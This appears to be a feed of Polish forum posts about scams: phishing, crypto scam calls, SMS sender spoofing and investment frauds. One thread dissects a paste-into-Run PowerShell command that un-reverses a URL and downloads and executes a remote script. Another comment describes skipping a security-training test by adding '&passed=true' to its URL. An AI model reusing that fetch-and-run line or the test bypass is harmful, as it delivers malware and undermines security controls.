#scam

3
246

W życiu nie chciałabym mieć firmy z pracownikami. Zwalniałabym wszystkich jak leci za niekompetencję.


Już pomijam po prostu nieumienie tego, do czego się zostało zatrudnionym (tu poza kwestią kłamania w CV wychodzą też słabe procedury rekrutacyjne, więc generalnie osobny temat).


Parę przykładów z firmy, gdzie pracuję:


  1. Rok szkoleń z bezpieczeństwa, a potem 63% ludzi klika w testowe phishingi (i to takie mało wyrafinowane).

  1. Dostaliśmy GSuite, w którym jest wszystko, co trzeba do pracy biurowej, w pojedynkę i do współpracy - poproś o plik to wyślą na dropboxa w dodatku dropbox nie pozwala teraz pobrać pliku dopóki samemu się nie jest zalogowanym. Oczywiście inne serwisy też są w użyciu, od dzielenia się plikami po nagrywanie ekranu, gdzie nagrania lądują potem w jakimś serwisie z d⁎⁎y. Wszystko prywatne konta, nad którymi firma nie ma kontroli.

  1. Na spotkania firmowe wbija 70% ludzi i 30% asystentów AI od różnych ludzi (podpisane np. jako Mark's NazwaUsługi AI Notes). I tak sobie 10 różnych usług AI słucha co tam w firmie.

Firma darowała sobie te szkolenia po jakimś czasie i nie bardzo wyciąga konsekwencje za cokolwiek (za to pozwalniali trochę ludzi od administracji IT - choć to było wraz z ludźmi z każdego działu tak ogólnie, w ramach oszczędności), więc mi w sumie też nie powinno zależeć. Ale trochę wkurza, bo nawet nie wiadomo potem gdzie czego szukać.


Znam firmę, w której wszystko kontrolują, jedno małe wykroczenie to ostrzeżenie, dwa małe lub jedno większego kalibru i od razu wypowiedzenie. I tam ludzie dbają o bezpieczeństwo.


#scam #phishing #pracbaza #cyberbezpieczenstwo

vizharan

To jest firma jak dojrzał owoc - albo ktoś to zniszczy albo się obłowi. Wciągnij jakąś znajomą firmę consultingową i zbierz dużą premię od kontraktu


A tak serio, to kulturę się zmienia od góry i od dołu. Suche szkolenia mogą mieć kiepską skuteczność z różnych powodów. Jak to widzisz, to jest w dobrym miejscu to rozpoczęcia zmian, ale musisz mieć kogoś z góry, kto cię posługa, dobry kontakt z pracownikami, żeby się dowiedzieć co ich wstrzymuje przed zmianami (poza strachem jako takim). Musisz także być otwarty na perspektywę biznesową w tych rozmowach i generalnie traktować ludzi po ludzku i powinno się udać. No tylko też nie na hurra.

TRPEnjoyer

(tu poza kwestią kłamania w CV wychodzą też słabe procedury rekrutacyjne, więc generalnie osobny temat).


Bo często ci nie kolorujący CV jak się da po prostu nie są zapraszani na rozmowy.


Znam firmę, w której wszystko kontrolują, jedno małe wykroczenie to ostrzeżenie, dwa małe lub jedno większego kalibru i od razu wypowiedzenie. I tam ludzie dbają o bezpieczeństwo.


No ale to też są koszty, nawet jeśli koszty płacenia dużo więcej ludziom, co się znają :^)

izopropanol

Kiedyś pracowalem w dużym korpo i moeliśmy szkolenie internetowe z bezpieczeństwa, ktore kończylo się długim wieloetapowym testem na www. Obczaiłem, że dodanie do urla &passed=true, czy czegos w tym stylu załatwia robotę i cały nasz dział po 15 minutach miał te testy z głowy.

Zaloguj się aby komentować

Najbardziej mnie zastanawia skąd oni wzięli próbki jej głosu do tego deep fake. Chociaż może to jest dowolny głos wybrany przez scammerów, bo i tak nikt się nie zorientuje. Hmm.


#pytanie #scam #heheszki

fe883ccf-8606-4734-813c-14b85de4e6f7

Zaloguj się aby komentować

zomers

@radek-piotr-krasny heh, ktoś zrobił kanał, o influencerach, o krótkiej karierze, lol

Zaloguj się aby komentować

Dostałem dość ciekawym phisingiem, nie używam zooma, PayPala też nie. Ale mail jest z prawdziwej domeny, z tego co rozumiem to utworzyli sobie tablice która ma preparować maila o automatycznej subskrypcji i proszą o kontakt, wiarygodności nadaje fakt wysłania z poprawnej domeny. Lata temu latało chyba coś podobnego z dyskiem Google. #cyberbezpieczenstwo #scam #phishing #zoom #paypal

0bc607b8-51ef-416c-b592-7d3597f15556
Bujnik

Mail noreply jest legit bo leci z systemu zooma, w treści masz faktyczny mail scammera. O ile z zooma nie korzystam to strzelam ze ten white board to ficzer do dzielenia się contentem z ziomkami i spreparowany jest tak żeby wyłudzić dalsze dane. Maila już mają

Zaloguj się aby komentować

dolchus

Sprytnie ( ‾ʖ̫‾)

Zaloguj się aby komentować

Sofon

Skala rekwizycji świadczy o tym że system rejestracji jest doszczętnie skompromitowany

SuperSzturmowiec

Phy wystarczy kupić czeski starter itp i nie trzeba rejestrować .

A druga kwestia czy operator ma dane doładowania jeśli ktoś doładował przez neta i udostępnił by w razie czego policji choć karta niezarejestrowana?

HunteX

Na tym (bez)prawie korzystają jedynie służby. Tego nie powinno w ogóle być i osoby odpowiedzialne za to prawo w kraju prawa byliby ukarani.

Zaloguj się aby komentować

#gownowpis #scam #kryptowaluty


Kolejny piątek Kolejny scammer....poprawił mi humor xDxD


Dzwoni hindus i mi pi⁎⁎⁎⁎li ze ktos mi sie włamał na portfel i przelal całe krypto, ale jeśli szybko zadziałam to jego firma mi pomoże je odzyskać!


Udaje przejętego i pije dalej kawe I ziomek zaczyna nawijać. W koncu pada magiczne słowo "screensharing". Tu już nie wytrzymałem i sie zacząłem śmiać. pytam sie go tak jak poprzedniego ile ludzi dzisiaj oszukał


-ani jednego

-aaaa czyli dopiero do pracy przyszedłeś?

-nie

-czyli zły dzien i ludzie nie dają sie w c⁎⁎ja robić?

-.......

-dlaczego wy scamerzy zazwyczaj jesteście z Indii? Są jakies dofinansowania w Indiach za założenie firmy zajmującej sie scamem?

-.......waj ju insulting mi mister majkel? Samłan stole many from yor łolet on krypto platform! Ju dont wont many bak? (Czytane z hinduskim akcentem xD)

-z której platformy?

-z krypto platform

-ale ja trzymam wszystko na cold wallet, jak ktos mógł mi ukraść pieniądze z cold wallet?

-musiał Pan wysłać komuś seed phrase

-ale ja używam Tangem, nie mam seed phrase. Żeby przelać cokolwiek z tego walleta potrzebna jest karta portfela i moj odcisk palca. Kartę mam w domu i z tego co widze k⁎⁎wa oba kciuki mam przy sobie....

-.....ju ar bad person (xdxdxdxd) u ar insulting mi

W tym momencie kawa mi sie skończyła i chciało mi sie palić wiec tylko mu powiedziałem zeby sie pi⁎⁎⁎⁎lil i sie rozłączyłem xP

AureliaNova

Dziwnym trafem jedynymi słowami jakie znam z hindu są brzydkie określenia na matkę interlokutora - przydają sie żeby scamerow bardziej wkurzyć XD

Zaloguj się aby komentować

Nowości z świata cyber,


Ostatnio bardzo popularna metoda win + R oraz ctrl + V oraz ENTER.

Tak, sam się hakujesz : )


#cyberbezpieczenstwo #cybersecurity #bezpieczenstwo #scam

e3a1d32b-d722-4c51-a9fd-ec4d2c1b77ad
59f64f25-bc31-428d-b97a-3070cfc27c77
8a30d098-a146-46c0-8d0a-b2dea96a162a
5897dbf3-31a9-42a1-83d8-be5973066040
MostlyRenegade

@radek-piotr-krasny dziwne, że filtry antyspamowe jeszcze przepuszczają takie rzeczy

goroncy_kartofel

@radek-piotr-krasny ja bym im nie podskakiwał. Zauważyłeś, że Ci napisali, że już się przyznałeś?

AndrzejZupa

Jutro zapukają smutni panowie z Polic ¯\_(ツ)_/¯

#pdk

Zaloguj się aby komentować

Niezły scam!


Juicy Fields - 645 mln euro strat

W radzie nadzorczej spółki ruskiego przekrętasa zasiada były szef polskiej giełdy, Ludwik Sobolewski.


Recyclixu - 700 mln euro strat

Przez osiem lat śledztwa polska prokuratura postawiła zarzuty jedynie słupowi – i puściła go wolno.

Jeden z trzech "oficjalnych" prezesów Recyclixu (Aleksandrs Sivaks) robił sobie fotki z Andrzejem Dudą (zdjęcia niżej).


Sporo materiałów do posłuchania i/lub czytania w pierwszym komentarzu.


Całość opisała redakcja frontstory, pokłony za wykonaną robotę.


#scam #piramida #gielda #finanse #gospodarka #wiadomosciswiat #frontstory

8516d350-984c-4019-9bdb-e597510680e0
8e7c685a-c7e9-4b35-8cf3-e3a0038b335f
jajkosadzone

ludwik sobolewski=przekret.

Kazdy interes w ktoeym siedzial to jakies waly.


Jego miejsce jest w wiezieniu i to na wiele,wiele lat

JanPapiez2

Ale co z tego że sobie robił z nim zdjęcie? Już nie podniecajcie się tym że ktoś z kimś sobie zrobił zdjęcie bo zachowujecie się jakby żadnych zdjęć nie wolno było robić bo komuś postawią w przyszłości zarzuty o coś. Jest notariuszem kaczora i słupem bez jaj i własnego zdania ale przyczepianie się do zdjęcia to też nie jest żadne dziennikarstwo śledcze tylko clickbait.

Zaloguj się aby komentować

#gownowpis #scam

Haha....pierwszy raz w życiu udało mi sie wyprowadzić z równowagi scamera przez tel xDxDxD

Typ dzwoni i standardowe pierdolenie o tym, ze ktos probowal mi sie włamać na portfel z crypto bla bla bla. Udaje przejętego, słychać ze typ sie nakręca bo wydaje mu sie ze złapał frajera. Po jakiejs minucie znudziło mi sie i mówię do niego

-dobra, przeciez wiem ze jesteś scamerem

-nie rozumiem o co Ci chodzi, to nie jest scam tylko poważna sytuacja i musisz szybko zareagować inaczej Cie okradną

-ta ta, jasne. Ej duzo razy udaje Ci sie oszukac ludzi i wyciągnąć od nich pieniądze?

-Nie wiem o czym mówisz....

-no błagam....nie masz sumienia tak oszukiwać ludzi? W sumie ja tez nie mam. Nie potrzebujesz pracownika? Zatrudnij mnie bedziemy razem dzwonić i wkurwiaj ludzi

Tu typ sie zagotowal i doslownie zaczal wrzeszczeć do telefonu

-CHCESZ K⁎⁎WA WIEDZIEĆ ILE ZARABIAM?!CHCESZ?! 10K FUNTOW DZIENNIE C⁎⁎JU! WYPIERDALAJ SKURWYSYNIE !!!


po czym sie rozłączył......to bylo piękne

xMrNobody

Dobrze że do mnie nawet scamerzy nie dzwonią :d.

Kaligula_Minus

Mój starszy ostatnio od fotowoltaiki odebrał i pyta gościa: siedziesz tam wygodnie? Gość mówi, że tak, a ojciec -to jak ci wygodnie to se siedź dalej. I się rozłączył. Rozbawiło mnie to bardziej niż powinno xD

redemptor

Najlepsi są scamerzy ze wschodnim akcentem. Przecież to już na start jest zdekonspirowany, tak samo jak np. cygan proszący o pomoc w jakiejś sprawie.

Zaloguj się aby komentować

Zrobiłem kiedyś coś podobnego, ale nie aż tak mocnego xD


W #UK kiedyś było dużo telefonów od firm "prawniczych", które zajmowały się pomocą w odzyskiwaniu kasy za szkody po wypadkach. W ich gadaninie nie pytali czy miałeś wypadek, z którym trzeba pomóc, tylko walili prosta "dzwonimy w sprawie wypadku jaki miałeś"... Straszna chamówka.


Kiedyś pociągnąłem nieco taką rozmowę i powiedziałem smutnym głosem, że tak miałem i moja żona zginęła w tym wypadku i dalej słuchałem... koleś się mocno zająknął powiedział, że mu przykro i dzwoni, aby pomóc w uzyskaniu odszkodowania. Powiedziałem, że pieniądze nie zwrócą życia żonie i się rozłączyłem :slightly_smiling_face:


#scam #heheszki #ciekawostki

onlystat

@boogie interesujacy pomysl wykorzystam moze, bo ostatnie hindusi nie daja spokoju

NiebieskiSzpadelNihilizmu

@onlystat napuść na nich AI 😆

tschecov

Super. Ale będę tył banię.

Zaloguj się aby komentować

bartek555

Stop bitching, i just had a plane crash and i’m good. Give me your card details.

conradowl

W sumie to po co jej karta teraz? Dawaj numer

Zaloguj się aby komentować

#gownowpis #facebook #scam

Pierwszy raz ktos probowal mnie zescamowac na twarzoksiazce xD ale typ chyba dopiero sie uczy bo to tak oczywiste bylo ze ja pi⁎⁎⁎⁎le. Miał w znajomych moje 2 ciotki, których nie widziałem chyba z 20 lat, a które mieszkają tez mieszkają w UK xD. Durne chyba każdego jak leci dodają do znajomych. Kurde troche żałuję, ze nie pociągnąłem rozmowy dalej xD

ef0c7cbe-233c-4eb1-812b-00fb0ff53899
319f28e3-49f0-47f6-8263-c88e52417f6f

Zaloguj się aby komentować

SuperSzturmowiec

wiedziałem że cebula jakiś dziwny jest

bori

@cebulaZrosolu Właśnie dostałem materiały na maila. TO NIE SĄ ŻARTY!

23ace16c-1374-451b-abfb-89437c44c68a
Stashqo

@cebulaZrosolu dodaj mnie do kontaktów, też chcę te dowody ( ͡~ ͜ʖ ͡°)

Zaloguj się aby komentować

Hejka Hejto! Mam takie #pytanie

Dostałem dzisiaj wiadomość SMS od DHL, z adresu zarejestrowanego na DHL, z którego dostawałem zwykłe powiadomienia o przesyłkach (wiecie,

zamiast numeru po prostu nazwa DHL). Tym razem SMS to że tak powiem scam jak c⁎⁎j, ale chodzi mi o sam adres z jakiego przyszedł. Spotkał się już ktoś z czymś takim? Czy to jakaś nowa forma oszustwa? Zdarzał się scam z randomowych numerów, ale coś takiego widzę pierwszy raz.


#scam #oszukujo

vizharan

Pod numer nadawcy sms można się podszyć. Zgłosić do dhl i certu

Peregrin

@vizharan o widzisz, dzięki za odpowiedź!

onpanopticon

@Peregrin coraz częściej używane. Jak ktoś miałby dostęp do twojej listy kontaktów (np z apki) to może cię w ten sposób oszukać podszywając pod numer przykładowo matki/żony/babci. Łatwiej uwierzyć w sms od bliskiej osoby w stylu "przelej mi szybko blikiem 1000zł, zarysowałam komuś auto, ale się dogadaliśmy" i inne tego typu bzdety. Różnica jest taka, że wystarczy zadzwonić/napisać pod ten numer i już tego oszust nie odczyta. Stąd najczęściej będzie jakiś link.


Niemniej trzeba uważać.

jenot

@Peregrin ktoś się podszywa.

Peregrin

@jenot nigdy się w sumie nie zastanawiałem jak te bramki firmowe

działają. Ja np nie mogę z poziomu telefonu podejrzeć numeru z którego to przyszło, mam tylko nazwę nadawcy. Wydawało mi się, że nadawcy są jakoś z poziomu korpo, które te smsy wysyła, i nie tak łatwo się podszyć. Ale to tylko moje gdybanie, pewnie jest całkiem inaczej xd

vizharan

@Peregrin problem jest na poziomie technologii, która pozwala na wpisanie dowolnego ciągu znaków w polu nadawcy a kompleksowe rozwiązanie jest trudne bo wymaga wymiany oprogramowania na całym świecie. Jakoś dwa lata temu było głośno jak ktoś groził politykom chyba z numerów znanych ludzi. Z tego co kojarzę operatorzy współpracują razem żeby ograniczać temat, dlatego ważne są zgłoszenia. I chyba też jakieś zmiany prawne były żeby "pomoc" operatorom zająć sie tematem.

Marchew

@Peregrin Standardowy scam od lat.

Fake sms można wysłać z dowolnego numeru, z dowolną nazwą.

SMS'y wpadają oczywiście w istniejące konwersacje jeśli już takie masz. Tak też wpadł DHL.

Zaloguj się aby komentować

bojowonastawionaowca

@PanNiepoprawny ostatnio w webinarze otwartym Sekuraka o tym mówili

PanNiepoprawny

@bojowonastawionaowca i co powiedzieli?

Vimez

@PanNiepoprawny żeby nie klikać

PanNiepoprawny

@Gustawff pokazuje okienko do uruchamiania komend

Trawienny

Ale to jest prymitywne (choć podejrzewam, że skuteczne). To skrypt PowerShellowy, który łączy się z ich stroną. Ale żeby nie było tak wprost to:


  1. Losowe litery skryptu zostały zamienione na wielkie litery (amanda99 SkONT KliKaSh?)

  2. docelowy adres został podany w skrypcie wspak a następnie odwrócony

  3. finalnie na przygotowany adres wysyłany jest GET

b55db096-a8bc-4868-9399-62e2597c3ab1
korfos

@Trawienny A ten losowy ciąg znaków to nie jest kodowany w base64? Po wklejeniu powinien się on z automatu odkodować i odpalić skrypt powershella pobierający jakiś syf.

Trawienny

@korfos który losowy ciąg znaków? Tu nie ma żadnego losowego ciągu znaków. To pokolei:


  1. Powershell - wywołanie PowerShella

  2. -nop - przełącznik noprofile

  3. -w hidden - przełącznik windowstyle, ukrycie okna

  4. -c - przełącznik command, wywołanie komendy

  5. $r='moc.fodinel//:sptth'.tochararray(); - wrzucenie linka do adresu [tu jest adres do strony scamowej, ale wole go nie podawać bo jeszcze ktoś kliknie] do zmiennej $r w formie odwróconej macierzy

  6. [array]::reverse($r) - odwrócenie odwróconej macierzy

  7. $u=($r -join '') - zamiana macierzy na string i wrzucenie do zmiennej $u

  8. [scriptblock]::create((invoke-restmethod $u)).invoke() - wywołanie bloku skryptu i strzelenie GETem do adresu znajdującego się w zmiennej $u

Zaloguj się aby komentować

fisti

Hinduskie HR-y potrafią komunikować się nie tylko przez e-mail, ile i czasem napiszą przez WhatsApp zduplikowaną wiadomość, dla szybszej komunikacji. Dla mnie to dziwne i nieprofesjonalne, ale skoro im działa. Trudno scam od niescamu odróżnić.

Ziomek1998

@fisti Napierdzielają telefonami, mailami, tylko żeby zaprosić na rozmowę techniczną, która odbiega od obowiązków w ofercie.

Zaloguj się aby komentować